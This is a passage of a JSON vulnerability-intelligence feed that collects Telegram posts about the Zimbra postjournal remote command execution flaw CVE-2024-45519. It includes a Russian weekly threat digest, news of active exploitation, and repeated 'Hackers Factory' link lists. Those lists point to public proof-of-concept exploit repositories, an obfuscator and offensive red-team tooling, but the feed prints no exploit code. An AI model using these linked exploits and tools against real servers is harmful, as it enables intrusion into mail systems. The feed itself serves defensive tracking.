"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/kasperskyb2b/1441", "content": "\u23e9 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83e\udd2f \u041e\u0431\u044b\u0447\u043d\u043e \u043c\u044b \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u043c \u043d\u043e\u0432\u043e\u0441\u0442\u0438 APT \u0431\u0435\u0437 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432, \u043d\u043e \u0442\u0443\u0442 \u0443\u0436 \u0431\u043e\u043b\u044c\u043d\u043e \u0443\u0432\u043b\u0435\u043a\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0441\u044e\u0436\u0435\u0442. WSJ \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u0438 \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0430\u0442\u0430\u043a APT Salt Typhoon \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0446\u0435\u0432, \u043f\u043e\u043b\u044c\u0437\u0443\u044f\u0441\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 \u0441\u0435\u0442\u044f\u0445 AT&T, Verizon \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u043a\u0438 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438\u043c\u0438 \u0441\u043f\u0435\u0446\u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 (\u0430\u043d\u0430\u043b\u043e\u0433 \u0421\u041e\u0420\u041c). \u042d\u0442\u043e \u2014 \u0445\u043e\u0440\u043e\u0448\u0435\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0431\u044d\u043a\u0434\u043e\u0440 \u0434\u043b\u044f \u043a\u043e\u0433\u043e-\u0442\u043e \u043e\u0434\u043d\u043e\u0433\u043e, \u0440\u0430\u043d\u043e \u0438\u043b\u0438 \u043f\u043e\u0437\u0434\u043d\u043e \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0434\u043b\u044f \u0432\u0441\u0435\u0445.\n\n\ud83d\udc7d SIEM \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0435 \u0437\u043b\u043e\u0434\u0435\u0435\u0432: \u0432 \u043d\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0438 \u0441\u0431\u043e\u0440\u0430 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u043b\u0438\u0435\u043d\u0442 open source SIEM Wazuh. \u041a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0446\u0435\u043b\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433.\n\n\ud83d\ude2e Cloudflare \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0441\u044c \u043e \u0431\u043e\u0440\u044c\u0431\u0435 \u0441 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0435\u0439 DDoS-\u0430\u0442\u0430\u043a\u043e\u0439 \u0430\u0436 \u043d\u0430 3,8 \u0422\u0431/\u0441.\n\n\ud83d\udc7e \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u0441\u0441\u0438\u0432\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u0441\u0442\u0443\u043f\u0430\u044e\u0442 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u043c\u0438 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u0447\u043d\u044b\u043c\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a. \u0411\u043e\u043b\u044c\u0448\u0435 \u0432\u0441\u0435\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430\u0439\u0434\u0435\u043d\u043e \u0432 \u0421\u0428\u0410, \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435 \u0438 \u0428\u0432\u0435\u0446\u0438\u0438, \u0441\u0430\u043c\u044b\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0435 \u0434\u0435\u0432\u0430\u0439\u0441\u044b \u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0435 \u2014 Asus \u0438 Qnap. \u041d\u0430 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u043e\u0431\u0440\u0430\u0437\u0446\u044b \u0412\u041f\u041e GobRAT \u0438 Bulbature. \n\n\u0410 \u0412\u041f\u041e perfctl \u0443\u0436\u0435 \u0442\u0440\u0438 \u0433\u043e\u0434\u0430 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0437\u0430\u0440\u0430\u0436\u0430\u0435\u0442 Linux-\u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f 20 \u0442\u044b\u0441\u044f\u0447 \u043e\u0448\u0438\u0431\u043e\u043a \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438.  \u041f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u0412\u041f\u041e \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0440\u0443\u0442\u043a\u0438\u0442\u043e\u043c \u0438 \u0446\u0435\u043b\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0434\u0440\u0443\u0433\u0438\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u0434\u043b\u044f \u043c\u0430\u043a\u0441\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0441\u0442\u0438. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0444\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043c\u0430\u0439\u043d\u0435\u0440.\n\n\u0412 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u043d\u0435\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u0443\u0435\u043c\u043e\u0439 APT Mustang Panda, \u043d\u0430\u0448\u0451\u043b\u0441\u044f \u043a\u043b\u0430\u0441\u0442\u0435\u0440, \u0432\u0438\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0439 \u043d\u043e\u0432\u043e\u0439 \u043f\u043e\u0434\u0433\u0440\u0443\u043f\u043f\u0435, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 CeranaKeeper. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0434\u043b\u044f \u04212 \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. \n\n\ud83d\udc6e\u200d\u2640\ufe0f\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043d\u043e\u0432\u044b\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 \u0438 \u0430\u0442\u0430\u043a Akira ransomware: TTP, IoC, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0445\u0430\u043d\u0442\u0438\u043d\u0433\u0443.\n\n\u2328\ufe0f\u041e\u0431\u0437\u043e\u0440 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 CyberVolk, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0430\u0447\u0438\u043d\u0430\u043b\u0430 \u0441 \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0437\u043c\u0430, \u0430 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 ransomware.\n\n\ud83d\ude93 \u041e\u043a\u043e\u043b\u043e 5% \u0432\u0441\u0435\u0445 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0449\u0438\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Magento/Adobe Commerce, \u0431\u044b\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u044b \u044d\u0442\u0438\u043c \u043b\u0435\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u0435\u0431-\u0441\u043a\u0438\u043c\u043c\u0435\u0440 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043e\u043f\u043b\u0430\u0442\u044b. \u0420\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043d\u0430\u043f\u0435\u0440\u0435\u0433\u043e\u043d\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 CVE-2024-34102 (CosmicSting).\n\n\ud83c\udf44 FIN7 \u043b\u043e\u0432\u0438\u0442 \u043d\u0430 \u043a\u043b\u0443\u0431\u043d\u0438\u0447\u043a\u0443: \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 NetSupport RAT \u0447\u0435\u0440\u0435\u0437 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0438\u043f\u0444\u0435\u0439\u043a-\u043e\u0431\u043d\u0430\u0436\u0451\u043d\u043a\u0438.\n\n\ud83d\udcf1 \u0410 \u0432 App Store \u0438 Google Play \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0442\u0440\u0435\u0439\u0434\u0438\u043d\u0433\u0430 \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0438\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0445\u0435\u043c pig butchering.\n\n\ud83c\udf83\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u0432: StealC (\u0430\u0436 \u0432 \u0442\u0440\u0451\u0445 \u0447\u0430\u0441\u0442\u044f\u0445) \u0438 Amnesia.\n\n\ud83d\udc40 \u041d\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0432\u0443\u0445 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:  CVE-2024-29824 \u0432 Ivanti Endpoint Manager \u0438 CVE-2024-45519 \u0432 \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Zimbra.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-10-07T15:36:21.000000Z"}, {"uuid": "04311642-8f5b-45c0-be54-d4338b40a44a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ton618cyber/4940", "content": "Researchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nUrgent patching is needed for Zimbra Collaboration as attackers exploit CVE-2024-45519 to execute commands.\n\nthehackernews.com \u2022 Oct 2, 2024", "creation_timestamp": "2024-10-02T16:48:09.000000Z"}, {"uuid": "dd8a9ac2-c136-4325-8fbc-9d100a00494b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/4921", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-> https://github.com/p33d/CVE-2024-45519\n\n2. CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:48.000000Z"}, {"uuid": "76c65d80-cc55-42ff-84aa-2d02ae7fcddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2101", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "999125f8-3ec7-474c-8092-ddc645a63a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/515", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-30T10:20:42.000000Z"}, {"uuid": "f9a2854f-8cd6-4438-9fa4-4822c7fdd918", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/z3xploit/668", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit \ud83c\udf4e\n\nExploit\n\n#Poc #cve #exploit", "creation_timestamp": "2024-10-10T09:54:11.000000Z"}, {"uuid": "b45bf6e4-3b0b-4ddb-b7ce-5d79dff924af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/1ZL9Gy8NcGFZ3EukYR7KgdreC6GML4uuvOnd8ACoqLrL-Q", "content": "", "creation_timestamp": "2024-10-02T10:21:54.000000Z"}, {"uuid": "a4dac830-028a-4c1d-bdc6-f614decfad2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1074", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:25:19.000000Z"}, {"uuid": "0458c5ef-1991-41a3-9170-ffa4261d9d6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1039", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:\u00a0 Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n\nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:39.000000Z"}, {"uuid": "688c45af-1f4a-4f72-8e5f-485bf7fc60d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/4798", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "56ac5916-1a1e-4506-b444-b531268bb273", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/24042", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}, {"uuid": "d34a10d4-104b-41ae-98dd-4a2663178ad6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/23977", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "7598bcc1-5af5-4de4-9335-19feb9130f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/23976", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:07.000000Z"}, {"uuid": "1e6baebe-8452-448c-89a6-d49e4d90651e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3798", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:24.000000Z"}, {"uuid": "71431c22-8ea8-4169-a8af-961c7b222726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3783", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:15.000000Z"}, {"uuid": "82940bad-130e-40cd-8064-c1dbc248b1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7519", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "9a8f3a19-91a8-41d2-8366-4f677ac2c10c", 